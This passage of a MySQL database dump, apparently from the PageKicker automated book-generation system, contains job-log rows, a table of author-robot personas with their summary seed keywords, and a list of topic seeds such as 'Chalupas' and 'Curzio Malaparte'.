'49d7b568-1b0c-11e3-ab8a-12313d16658b', '2013-09-11 18:02:14', 350, 'en_US.UTF-8'),\n(406, '00b35b34-1b0d-11e3-b97d-12313d16658b', '2013-09-11 18:07:21', 351, 'en_US.UTF-8'),\n(406, '427403ca-1b0d-11e3-8923-12313d16658b', '2013-09-11 18:09:11', 352, 'en_US.UTF-8'),\n(406, '79ad0a08-1b0d-11e3-9c59-12313d16658b', '2013-09-11 18:10:44', 353, 'en_US.UTF-8'),\n(407, 'b33ee154-1b14-11e3-9cda-12313d16658b', '2013-09-11 19:02:28', 354, 'en_US.UTF-8'),\n(407, 'bf3a56b8-1b15-11e3-bdd2-12313d16658b', '2013-09-11 19:09:56', 355, 'en_US.UTF-8'),\n(407, 'b4559a4a-1b16-11e3-9bf4-12313d16658b', '2013-09-11 19:16:48', 356, 'en_US.UTF-8'),\n(407, 'ff8b5e90-1b17-11e3-8179-12313d16658b', '2013-09-11 19:26:03', 357, 'en_US.UTF-8'),\n(407, '0a15d560-1b19-11e3-bae6-12313d16658b', '2013-09-11 19:33:30', 358, 'en_US.UTF-8'),\n(407, '5eb9b0aa-1b1e-11e3-b39a-12313d16658b', '2013-09-11 20:11:40', 359, 'en_US.UTF-8'),\n(407, '8827481c-1b1e-11e3-9013-12313d16658b', '2013-09-11 20:12:49', 360, 'en_US.UTF-8'),\n(407, '9c4a4ac6-1b3f-11e3-9178-12313d16658b', '2013-09-12 00:09:37', 361, 'en_US.UTF-8'),\n(407, '07decd90-1bc0-11e3-8fcb-12313d16658b', '2013-09-12 15:28:54', 362, 'en_US.UTF-8'),\n(407, '9bf73c0e-1bc2-11e3-a932-12313d16658b', '2013-09-12 15:47:21', 363, 'en_US.UTF-8'),\n(407, '635500d8-1bc3-11e3-aaeb-12313d16658b', '2013-09-12 15:52:56', 364, 'en_US.UTF-8'),\n(407, '97bdf634-1bc5-11e3-8c56-12313d16658b', '2013-09-12 16:08:43', 365, 'en_US.UTF-8'),\n(407, 'f32c58d2-1be6-11e3-ae92-12313d16658b', '2013-09-12 20:07:29', 366, ''),\n(407, '997d36d4-1be7-11e3-b475-12313d16658b', '2013-09-12 20:12:07', 367, 'it_IT.UTF-8'),\n(407, '6791b932-1be8-11e3-9e05-12313d16658b', '2013-09-12 20:17:54', 368, 'it_IT.UTF-8'),\n(407, '51bcec7a-1be9-11e3-911a-12313d16658b', '2013-09-12 20:24:27', 369, 'en_US.UTF-8'),\n(407, '57a47b58-1be9-11e3-b989-12313d16658b', '2013-09-12 20:24:36', 370, 'it_IT.UTF-8'),\n(407, '68151d1c-1be9-11e3-8934-12313d16658b', '2013-09-12 20:25:04', 371, 'en_US.UTF-8'),\n(407, '76b8391c-1be9-11e3-b002-12313d16658b', '2013-09-12 20:25:29', 372, 'en_US.UTF-8'),\n(407, 'ee0c06a2-1c3d-11e3-b33f-12313d16658b', '2013-09-13 06:30:07', 373, ''),\n(410, 'd024839e-216a-11e3-bb93-12313d16658b', '2013-09-19 20:34:00', 374, 'en_US.UTF-8'),\n(410, 'a99e8eba-2221-11e3-9441-12313d16658b', '2013-09-20 18:22:52', 375, 'en_US.UTF-8'),\n(410, 'f7867468-2239-11e3-a757-12313d16658b', '2013-09-20 21:16:52', 376, 'en_US.UTF-8'),\n(410, 'd7a04c0a-226b-11e3-b594-12313d16658b', '2013-09-21 03:13:53', 377, ''),\n(410, '5e49c96a-23e4-11e3-a255-12313d16658b', '2013-09-23 00:09:10', 378, 'en_US.UTF-8'),\n(410, '4bbbf35a-2492-11e3-81ea-12313d16658b', '2013-09-23 20:54:12', 379, 'en_US.UTF-8'),\n(410, 'f095ff5c-24af-11e3-94e5-12313d16658b', '2013-09-24 00:26:22', 380, 'en_US.UTF-8'),\n(410, 'f8359498-24af-11e3-a6d8-12313d16658b', '2013-09-24 00:26:35', 381, 'en_US.UTF-8'),\n(410, 'c9fdbd34-253c-11e3-a605-12313d16658b', '2013-09-24 17:14:38', 382, 'en_US.UTF-8'),\n(413, '593fcd2c-260d-11e3-acc9-12313d16658b', '2013-09-25 18:07:34', 383, 'en_US.UTF-8'),\n(413, 'dab602ae-260d-11e3-9109-12313d16658b', '2013-09-25 18:11:09', 384, 'en_US.UTF-8'),\n(413, 'e002852a-260d-11e3-a267-12313d16658b', '2013-09-25 18:11:18', 385, 'en_US.UTF-8'),\n(413, 'bf2fa53c-2610-11e3-8726-12313d16658b', '2013-09-25 18:31:52', 386, 'en_US.UTF-8'),\n(413, 'c5fde37e-2610-11e3-bdc6-12313d16658b', '2013-09-25 18:32:04', 387, ''),\n(413, 'd744c3f0-2610-11e3-a337-12313d16658b', '2013-09-25 18:32:33', 388, 'en_US.UTF-8'),\n(413, 'dd180a62-2610-11e3-b974-12313d16658b', '2013-09-25 18:32:43', 389, 'en_US.UTF-8'),\n(413, 'e07e4234-2610-11e3-b653-12313d16658b', '2013-09-25 18:32:48', 390, 'en_US.UTF-8'),\n(414, '343121ca-278e-11e3-9564-12313d16658b', '2013-09-27 16:02:26', 391, 'en_US.UTF-8'),\n(414, '0773015a-2791-11e3-97b5-12313d16658b', '2013-09-27 16:22:40', 392, 'en_US.UTF-8'),\n(414, '0e956c10-2792-11e3-aca2-12313d16658b', '2013-09-27 16:30:01', 393, 'en_US.UTF-8'),\n(415, '597f692e-2797-11e3-8e54-12313d16658b', '2013-09-27 17:07:54', 394, 'en_US.UTF-8'),\n(415, '34d2d312-2798-11e3-b096-12313d16658b', '2013-09-27 17:14:02', 395, 'en_US.UTF-8'),\n(415, '2355f8a2-2799-11e3-a8e1-12313d16658b', '2013-09-27 17:20:42', 396, 'en_US.UTF-8'),\n(415, '866d81bc-2799-11e3-927b-12313d16658b', '2013-09-27 17:23:29', 397, 'en_US.UTF-8'),\n(415, '818a2cda-279a-11e3-a9f2-12313d16658b', '2013-09-27 17:30:30', 398, 'en_US.UTF-8'),\n(414, '4e4cec68-27ae-11e3-b0fc-12313d16658b', '2013-09-27 19:52:15', 399, 'en_US.UTF-8'),\n(414, 'eeb708ae-27fa-11e3-9018-12313d16658b', '2013-09-28 05:00:46', 400, ''),\n(414, '0d60f030-28a0-11e3-a325-12313d16658b', '2013-09-29 00:42:43', 401, 'en_US.UTF-8'),\n(415, 'a5d05428-29d1-11e3-be8a-12313d16658b', '2013-09-30 13:10:17', 402, 'en_US.UTF-8'),\n(415, 'da736336-29eb-11e3-8eb4-12313d16658b', '2013-09-30 16:17:51', 403, 'en_US.UTF-8'),\n(415, '4c437428-29ed-11e3-84ec-12313d16658b', '2013-09-30 16:28:11', 404, 'en_US.UTF-8'),\n(415, '41c6cfa2-29ef-11e3-8fa7-12313d16658b', '2013-09-30 16:42:12', 405, 'en_US.UTF-8'),\n(415, 'aac7b200-29ef-11e3-b5d9-12313d16658b', '2013-09-30 16:45:09', 406, 'en_US.UTF-8'),\n(415, '6b99380a-29f0-11e3-8d19-12313d16658b', '2013-09-30 16:50:32', 407, 'en_US.UTF-8'),\n(415, 'cec5d990-29f2-11e3-a1df-12313d16658b', '2013-09-30 17:07:37', 408, 'en_US.UTF-8'),\n(415, '12e27f66-29f3-11e3-8a48-12313d16658b', '2013-09-30 17:09:32', 409, 'en_US.UTF-8'),\n(415, '3bd362e6-29f3-11e3-ae2e-12313d16658b', '2013-09-30 17:10:40', 410, 'en_US.UTF-8'),\n(415, 'dc12aa46-29f3-11e3-aa09-12313d16658b', '2013-09-30 17:15:09', 411, 'en_US.UTF-8'),\n(415, '07bb02be-29f5-11e3-80c1-12313d16658b', '2013-09-30 17:23:32', 412, 'en_US.UTF-8'),\n(415, 'b34e6b84-29f5-11e3-bd52-12313d16658b', '2013-09-30 17:28:20', 413, 'en_US.UTF-8'),\n(415, '18567fd0-29f6-11e3-9929-12313d16658b', '2013-09-30 17:31:09', 414, 'en_US.UTF-8'),\n(415, '688804c4-29fb-11e3-9cb2-12313d16658b', '2013-09-30 18:09:11', 415, 'en_US.UTF-8'),\n(415, '705b31bc-29fb-11e3-a106-12313d16658b', '2013-09-30 18:09:24', 416, 'en_US.UTF-8'),\n(415, '75f9c0ac-29fb-11e3-9137-12313d16658b', '2013-09-30 18:09:34', 417, 'en_US.UTF-8'),\n(415, '33269646-29fc-11e3-bc06-12313d16658b', '2013-09-30 18:14:51', 418, 'en_US.UTF-8'),\n(415, 'af4dc49c-29fc-11e3-bcc5-12313d16658b', '2013-09-30 18:18:20', 419, 'en_US.UTF-8'),\n(415, '300dff60-29fe-11e3-8355-12313d16658b', '2013-09-30 18:29:05', 420, 'en_US.UTF-8'),\n(415, 'e3efb866-29fe-11e3-876a-12313d16658b', '2013-09-30 18:34:07', 421, 'en_US.UTF-8'),\n(415, '4c1fdb54-2a00-11e3-8c6e-12313d16658b', '2013-09-30 18:44:11', 422, 'en_US.UTF-8'),\n(415, '510983da-2a01-11e3-9f81-12313d16658b', '2013-09-30 18:51:29', 423, 'en_US.UTF-8'),\n(415, 'c1cdf268-2a01-11e3-a0bd-12313d16658b', '2013-09-30 18:54:38', 424, 'en_US.UTF-8'),\n(415, '372c7002-2a02-11e3-b3fd-12313d16658b', '2013-09-30 18:57:55', 425, 'en_US.UTF-8'),\n(416, 'bd81a026-2a13-11e3-8b18-12313d16658b', '2013-09-30 21:03:22', 426, 'en_US.UTF-8'),\n(415, '2da93806-2a72-11e3-a2c9-12313d16658b', '2013-10-01 08:19:24', 427, 'en_US.UTF-8'),\n(417, '151c5174-2ab3-11e3-81e0-12313d16658b', '2013-10-01 16:03:59', 428, 'en_US.UTF-8'),\n(417, '026cd5c0-2ab4-11e3-b089-12313d16658b', '2013-10-01 16:10:37', 429, 'en_US.UTF-8'),\n(417, '3ba636e2-2ab4-11e3-92a1-12313d16658b', '2013-10-01 16:12:13', 430, 'en_US.UTF-8'),\n(417, '1750a83e-2abb-11e3-8da7-12313d16658b', '2013-10-01 17:01:19', 431, 'en_US.UTF-8'),\n(417, '69ac8670-2abb-11e3-be4d-12313d16658b', '2013-10-01 17:03:37', 432, 'en_US.UTF-8'),\n(417, '385fea84-2d46-11e3-976b-12313d16658b', '2013-10-04 22:42:17', 433, ''),\n(415, 'd93bb9a4-2d7f-11e3-b108-12313d16658b', '2013-10-05 05:34:49', 434, ''),\n(418, 'bdee9f36-2f69-11e3-92ef-12313d16658b', '2013-10-07 16:01:35', 435, ''),\n(418, 'bb64edcc-3001-11e3-8dbc-12313d16658b', '2013-10-08 10:09:34', 436, ''),\n(428, '36a59cd0-3673-11e3-9414-12313d16658b', '2013-10-16 14:57:03', 437, 'en_US.UTF-8'),\n(428, '3db3808c-3673-11e3-91e7-12313d16658b', '2013-10-16 14:57:14', 438, 'en_US.UTF-8'),\n(436, 'c5cfa3a0-3b83-11e3-9931-12313d16658b', '2013-10-23 01:38:09', 439, 'en_US.UTF-8'),\n(436, '36c75cc4-3b84-11e3-b800-12313d16658b', '2013-10-23 01:41:19', 440, 'en_US.UTF-8'),\n(436, '2ef6f676-3c47-11e3-8e23-12313d16658b', '2013-10-24 00:56:58', 441, 'en_US.UTF-8');\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `robots`\n--\n\nCREATE TABLE IF NOT EXISTS `robots` (\n `robot_id` int(11) NOT NULL AUTO_INCREMENT,\n `robot_name` text NOT NULL,\n `robot_bio` text NOT NULL,\n `robot_dedication` text NOT NULL,\n `robot_summarizer_on` text NOT NULL,\n `robot_positive_summary_seed` text NOT NULL,\n `robot_positive_summary_seed_weight` int(11) NOT NULL,\n `robot_summary_length` int(11) NOT NULL DEFAULT '10',\n `robot_negative_seeds` text NOT NULL,\n `robot_negative_seed_weight` int(11) NOT NULL,\n `robot_coverfont` text NOT NULL,\n `robot_covercolor` text NOT NULL,\n `robot_userlogo_path` text NOT NULL,\n `robot_image_path` text NOT NULL,\n `robot_first_name` text NOT NULL,\n `robot_middle_name` text NOT NULL,\n `robot_last_name` text NOT NULL,\n `robot_fortune_db` text NOT NULL,\n `robot_ngram_threshold` int(11) NOT NULL DEFAULT '2',\n `robot_language` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8',\n `robot_booktype` enum('Reader') NOT NULL DEFAULT 'Reader',\n `robot_rows` int(11) NOT NULL,\n `robot_experience_points_initial` int(11) NOT NULL,\n `robot_experience_points_now` int(11) NOT NULL DEFAULT '100',\n `robot_ner_preferences` enum('AlchemyAPI','experimental','none') NOT NULL,\n PRIMARY KEY (`robot_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=28 ;\n\n--\n-- Dumping data for table `robots`\n--\n\nINSERT INTO `robots` (`robot_id`, `robot_name`, `robot_bio`, `robot_dedication`, `robot_summarizer_on`, `robot_positive_summary_seed`, `robot_positive_summary_seed_weight`, `robot_summary_length`, `robot_negative_seeds`, `robot_negative_seed_weight`, `robot_coverfont`, `robot_covercolor`, `robot_userlogo_path`, `robot_image_path`, `robot_first_name`, `robot_middle_name`, `robot_last_name`, `robot_fortune_db`, `robot_ngram_threshold`, `robot_language`, `robot_booktype`, `robot_rows`, `robot_experience_points_initial`, `robot_experience_points_now`, `robot_ner_preferences`) VALUES\n(1, 'Dummy', '', '', '', '', 0, 10, '', 0, '', '', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 0, 100, 100, ''),\n(2, 'Stubby', 'the robot', '', '', '', 0, 10, '', 0, '', '', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 0, 100, 100, ''),\n(3, 'sm', 'asd', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(4, 'Test Robot', 'Hates Ohio!', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(5, 'Ming the merciless', 'edits ruthlessly', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'cs_CZ.UTF-8', 'Reader', 15, 100, 100, ''),\n(6, 'Hamburger helper', 'recipe', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(7, 'Mung', 'Mung', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(8, 'Basher', 'zoof', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(9, 'POw', 'pow', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(10, 'Larry', 'lasd', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(11, 'Rotary Randy', 'asdf', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(12, 'Ken robot', 'sd', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(13, 'Emile Zola', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(14, 'Jack London', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(15, 'Erle Stanley Gardner', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 120, 100, ''),\n(16, 'red line', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(17, 'Justinius Legem', '', '', '', '', 0, 10, '', 0, 'Random', 'Random', 'userassets/wk/wk.jpg', 'userassets/wk/Justinian.jpg', 'Justinius', '', 'Legem', '', 2, 'it_IT.UTF-8', 'Reader', 15, 100, 100, ''),\n(18, 'Jellicoe', '', '', 'Y', 'navy', 0, 15, '', 0, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(19, 'Hannibal Lecter', '', '', 'Y', 'cannibal', 0, 5, '', 0, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(20, 'Lex Luthor', '', '', 'Y', 'bald', 1000, 25, '', 0, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(21, 'Telly Savalas', '', '', 'Y', 'bald', 1000, 15, 'hair', 10001, '', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(22, 'TSA Tony', '', '', 'Y', 'terrorism', 1000, 15, 'liberty', 10000, '3', 'Random', '', '', '', '', '', '', 0, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(23, 'Spammyh', '', '', 'Y', 'Nigeria', 10, 10, 'police', 10, 'Random', 'Random', '', '', '', '', '', '', 3, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(24, 'Bernardo', 'He is from Italy!', '', 'Y', 'diritto', 3, 10, 'di', 0, 'Random', 'Random', '', '', '', '', '', '', 3, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(25, 'TSA Tommy', 'Tommy is a robot who writes about homeland security.', '', 'Y', 'terrorism', 1, 10, 'liberty', 1, 'Random', 'Random', '', '', '', '', '', '', 3, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(26, 'test', 'test', '', 'Y', '', 1, 10, '', 1, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, ''),\n(27, 'Fast Heinz', 'PageKicker robot Fast Heinz specializes in the military history of World War II with an emphasis on armored warfare and German forces.', '', 'Y', 'wehrmacht panzer armor ', 5, 10, 'medieval nazi', 3, 'Random', 'Random', '', '', '', '', '', '', 2, 'en_US.UTF-8', 'Reader', 15, 100, 100, 'AlchemyAPI');\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `seeds`\n--\n\nCREATE TABLE IF NOT EXISTS `seeds` (\n `uuid` mediumtext NOT NULL,\n `seed` mediumtext NOT NULL,\n `seedsource` mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n--\n-- Dumping data for table `seeds`\n--\n\nINSERT INTO `seeds` (`uuid`, `seed`, `seedsource`) VALUES\n('29d47ca0-ddf5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('776fabba-ddf5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c76e7e34-ddf5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f1695e84-ddf5-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('952698de-ddf6-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('3260b1a2-ddf7-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('4bee0090-de9f-11e2-acfa-12313d015d04', 'Deimos', ''),\n('a123b32a-de9f-11e2-acfa-12313d015d04', 'Deimos', ''),\n('4d370766-dea0-11e2-acfa-12313d015d04', 'Phobos', ''),\n('d4ee4782-dea0-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('666d01da-dea1-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e32256de-dea2-11e2-acfa-12313d015d04', 'Edward Snowden', ''),\n('338747be-dea4-11e2-acfa-12313d015d04', 'Motor Torpedo Boat', ''),\n('a552f044-debf-11e2-acfa-12313d015d04', 'no', ''),\n('c4b30fe6-debf-11e2-acfa-12313d015d04', 'PT boat', ''),\n('86f74260-dec1-11e2-acfa-12313d015d04', 'PT boat', ''),\n('74edbbc8-df46-11e2-acfa-12313d015d04', 'PT boat', ''),\n('8e61470a-df50-11e2-acfa-12313d015d04', 'PT boat', ''),\n('46d0eaae-e5a3-11e2-acfa-12313d015d04', 'Castles', ''),\n('af5f30de-e5a4-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('3baa1888-e5a5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c188ef56-e5a5-11e2-acfa-12313d015d04', 'Castle', ''),\n('a10a5002-e5a6-11e2-acfa-12313d015d04', 'Iain M. Banks', ''),\n('d4532488-e5a7-11e2-acfa-12313d015d04', 'Iain M. Banks', ''),\n('24073db0-e5a9-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('5aa1b9c2-e5a9-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('b5871dae-e5aa-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('da417572-e5aa-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('a6db2178-e5ab-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('9dc819f0-e5ac-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('0f6cad5a-e5ad-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('726733e4-e5ad-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('2135d632-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('5ab07656-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('a8f5d900-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e1190622-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('152393f6-e5af-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6c8d7fda-e5af-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('e281f432-e5af-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('805e1682-e73f-11e2-acfa-12313d015d04', 'Legend of Korra', ''),\n('6078977e-e740-11e2-acfa-12313d015d04', 'Legend of Korra', ''),\n('8da80caa-e742-11e2-acfa-12313d015d04', 'Motor Torpedo Boat', ''),\n('72202598-e743-11e2-acfa-12313d015d04', 'Motor Torpedo Boat', ''),\n('82f9f72c-e743-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('532fd2c2-e744-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('11b8c51e-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('2dc0db98-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('66753a56-e745-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('b6fa6730-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c75dd602-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f61d509e-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1f92adb6-e746-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('2ced5868-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('ad46348a-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('cb165c7e-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('da7cc3ce-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('25116d2c-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('45e90d0c-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6aa92b36-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('a7f210ca-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('413abbf6-e74c-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('63da952c-e74d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('bbe8a326-e74d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('35b1c934-e74f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('677d71ac-e74f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('36786b72-e75c-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('85e12474-e75c-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('516f92b0-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('7c0951e6-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('949ef468-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e0d4707e-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f2a26bb2-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('4e576430-e75e-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('004616c8-e75f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1a7ab512-e75f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('536006a2-e75f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1c85f7e4-e760-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6458c5f6-e760-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c8d99136-e760-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('00eee8b8-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1544f53c-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('bb98ba04-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('d68b214e-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('62f6923a-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('8ea13aca-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('af4a4e74-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('cb02ea2c-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('306e6fea-e76d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('59578530-e76e-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c76c8ef8-e76e-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('3446167a-e76f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f20f3af6-e76f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('01da5796-e7e2-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('5a3e8c58-e7e3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c157b2a2-e7e3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f45c2b6e-e7e4-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('aad83d80-e806-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6613f8a4-e808-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('e64c9366-e80b-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('8116d7c0-e8c6-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('ea3d2af0-e8c7-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('831d832c-e8c9-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('aa2c760c-e8ca-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('d824913e-e8ca-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('d4361128-e8cb-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('51955596-e8d3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('93ce3874-e8d3-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('4dbc5efe-e8ee-11e2-acfa-12313d015d04', 'curzio malaparte', ''),\n('18a29132-e8f0-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('1e495034-e8f1-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('8166a00e-e8f1-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('c1b3736c-e8f1-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('10441c50-e8f4-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('e02d25ec-e98f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('37ead504-e990-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('5f70a090-e990-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('0abedb60-e991-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('32682aac-e993-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c3568bd0-e993-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('37eb59d6-e9bb-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('582f2d4e-e9bb-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('28023588-e9bd-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('617fef80-e9bd-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('756cedf4-e9bd-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e6556dde-e9c2-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('3539c0bc-e9c3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('51059fd8-ea67-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('65208fe6-ea67-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('0ad42114-ea68-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('25d2608e-ea68-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('f8aaf750-ea68-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('2ffdbc60-ea69-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('732e7c7c-ea69-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('a8934476-eb1b-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('acbf78da-eb1b-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('be8932fe-eb1b-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('038f019e-eb1c-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('95f1f8c0-eb1c-11e2-acfa-12313d015d04', 'Apprendistato', 